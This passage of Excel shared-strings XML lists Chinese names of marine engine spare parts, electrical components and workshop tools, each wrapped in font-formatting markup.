        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>前端标记</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>旋转闪光灯</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操纵手柄</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>启动箱</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>仪表刻度</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>灯帽</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连接盖</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>联锁开关</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调光器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电位器调光器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <t>PLC</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>模块</t>
    </r>
  </si>
  <si>
    <r>
      <t>PLC</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电源</t>
    </r>
  </si>
  <si>
    <r>
      <t>PLC</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扩展基本单元</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>模拟模块</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>过滤组件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管接头组件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>印刷板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>印刷板固定器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <t>PLC</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>基本单元</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>手持编程器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>数字式速度控制</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>发电机负荷传感器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电脑</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>监测器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电脑附件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>船用电脑</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>晶体管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>火花塞伸长部</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>高压部件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>点火系统</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>线性驱动器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>可转接头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接头部件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>单链轮</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带螺母螺丝</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>夹箍（整体）</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带锁夹箍</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>闭合设备</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带底座的径向滚球轴承</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>径向带法兰轴承</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带底座的轴向滚球轴承</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴向带底座的滚针轴承</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴向球轴承</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲线滚筒</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支撑底座</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>信号箱支架</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>有把手的圆盖</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>有把手的方盖</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>有把手的椭圆盖</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>钢</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>+</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铸铁密封环</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带支撑的</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>kant</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>橡胶包裹密封环</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>信号箱安装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>外来图纸</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>圆形绝缘垫</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>钢管套接焊接</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带限位的直接头</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>球阀备件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>启动和喷射辅助箱</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>保护软管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电缆绑带支架</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>开槽螺母管钳</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>特殊销扳手</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>可调开口扳手</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>棘轮扳手</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>偏移扳手</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吊环螺栓架</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺钉夹具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹簧安装锥</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>部件</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压拉伸器工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压拉伸器（配件</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">) </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内外锥套</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中间帽</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锥形定位销</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑车</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带螺柱夹箍</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带刹车的移动推车</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>防擦材料</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>倾斜工具支柱</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工作平台</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>填料函环</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>端铣刀具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>研磨棒</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>研磨环</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>表面磨床</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锥形磨床</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铲形钻杆</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铲形钻头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>钻床液压单元</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>刮板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>清洁钻</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>示功纸</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>测功器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>指针表支座</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>平面仪</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>可调销规</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>销规扩展</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>游标卡尺</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>测试心轴公差</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>1</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
